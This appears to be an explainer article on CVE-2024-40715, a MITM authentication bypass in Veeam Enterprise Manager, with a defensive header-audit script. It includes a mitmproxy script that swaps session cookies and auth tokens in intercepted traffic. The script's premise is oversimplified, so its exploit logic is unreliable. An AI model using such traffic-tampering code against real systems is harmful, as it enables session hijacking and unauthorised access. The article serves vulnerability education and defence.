CVE-2024-40715 - How MITM Attackers Can Bypass Authentication in Veeam Backup & Replication Enterprise Manager
In June 2024, a new security vulnerability was identified in Veeam Backup & Replication Enterprise Manager (B&R EM), tracked as CVE-2024-40715. Unlike typical software flaws, this vulnerability allows attackers to bypass authentication – but only if they're able to pull off a Man-in-the-Middle (MITM) attack. This article simplifies the technical details, shows you a basic attack scenario, and offers defensive guidance.
What is CVE-2024-40715?
Veeam Backup & Replication Enterprise Manager is used by many organizations to manage backups and restore tasks centrally. In versions affected by CVE-2024-40715, the authentication system can be tricked, letting attackers access admin functions without valid credentials, provided they can intercept and manipulate network traffic between an admin and the server.
Original Advisory
- Veeam Security Advisory VEEAM-SA-2024-013
- NIST National Vulnerability Database - CVE-2024-40715
How the Vulnerability Works
The core issue here is network-based:
- The Enterprise Manager does not verify critical parts of the authentication if certain network-level tricks are performed.
- The flaw can be triggered if someone is able to intercept (MITM) the traffic between the administrator's browser and the Veeam server.
- Attackers can modify or hijack the authentication process, potentially logging in as an administrator without ever entering the password.
Exploit Scenario: A Walkthrough
NOTE: The following content is for educational and defensive purposes only.
Modify Authentication Data:
The attacker tampers with the login request or response. For example, altering tokens or session cookies to escalate privileges.
Example Exploit Snippet
Below is a Python script outline which helps visualize how a MITM attacker could tamper with web traffic, using a tool like mitmproxy. Assume the attacker has already set up interception:
# This script runs as a mitmproxy inline script (addon loaded with mitmproxy -s)
import json


def response(flow):
    # Check if this is the EM login endpoint
    if flow.request.pretty_url.endswith("/EnterpriseManager/login"):
        # Try to detect a redirect after successful authentication
        if "Set-Cookie" in flow.response.headers:
            # Force authentication bypass by injecting own admin session cookie
            flow.response.headers["Set-Cookie"] = (
                "EM_SessionId=adminsessionexample; Path=/; HttpOnly"
            )
            print("[+] Injected admin session cookie!")

    # Advanced: intercept JSON responses and inject own token
    if "/api/" in flow.request.pretty_url and flow.response.headers.get("Content-Type", "") == "application/json":
        data = flow.response.json()
        if "authToken" in data:
            data["authToken"] = "injected_attack_token"
            flow.response.text = json.dumps(data)
            print("[+] Injected forged token into API response")
This code tells the proxy to replace real session cookies with a fake, attacker-controlled session. In reality, attackers may need to study the exact cookie or token names, but the concept remains the same.
Defenses Against CVE-2024-40715
The attack only works if MITM is possible!
Preventing network interception is your first line of defense.
- Apply the Veeam security patch now.
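The defensive side of the cookie and token swapping shown above, as an added example that is not Veeam's code or part of the original article: an audit of the HTTP response headers an Enterprise Manager login returns, checking for HSTS (so a browser refuses to fall back to plain HTTP where interception is easiest) and for session cookies carrying Secure, HttpOnly and SameSite. The cookie name EM_SessionId and all header values are constructed sample data.

```python
# Added example (not Veeam's code): audit the response headers of an
# Enterprise Manager login for the properties that make a MITM attacker's
# cookie/token swap harder. Header and cookie values are constructed samples.
import re

MIN_HSTS_AGE = 31536000  # one year, in seconds
SESSION_COOKIES = {"em_sessionid"}  # constructed name, mirrors the article's example


def parse_set_cookie(value):
    """Return (cookie_name, {attribute: value}) for one Set-Cookie header."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_login_response(headers):
    """headers: list of (name, value) pairs; repeated names are allowed.
    Returns a list of findings; an empty list means nothing to flag."""
    findings = []
    hsts = [v for n, v in headers if n.lower() == "strict-transport-security"]
    if not hsts:
        findings.append("HSTS header missing: browser will follow plain-HTTP redirects")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0], re.I)
        if not m or int(m.group(1)) < MIN_HSTS_AGE:
            findings.append("HSTS max-age below one year")
    for n, v in headers:
        if n.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(v)
        if name.lower() not in SESSION_COOKIES:
            continue
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append(f"session cookie {name} lacks {flag}")
    return findings


# Constructed sample responses: one weak, one hardened.
WEAK = [("Content-Type", "text/html"),
        ("Set-Cookie", "EM_SessionId=abc123; Path=/; HttpOnly")]
HARDENED = [("Strict-Transport-Security", "max-age=63072000; includeSubDomains"),
            ("Set-Cookie", "EM_SessionId=abc123; Path=/; Secure; HttpOnly; SameSite=Strict")]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_login_response(hdrs) or ["ok"])
```

Run it against headers captured from your own Enterprise Manager login (for example via the browser's developer tools) after patching; the weak sample above produces three findings and the hardened one none.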
Conclusion
CVE-2024-40715 is a serious authentication bypass for Veeam B&R Enterprise Manager, but only attackers with MITM capabilities are able to use it. This means network security is just as important as patching the software itself.
Refer to the official Veeam guidance and update immediately, and make sure no one on your network can act as a Man-in-the-Middle.
References
- Veeam Security Advisory VEEAM-SA-2024-013
- NIST NVD CVE-2024-40715
- MITMproxy Documentation
Timeline
Published on: 11/07/2024 17:15:08 UTC
Last modified on: 11/08/2024 19:01:03 UTC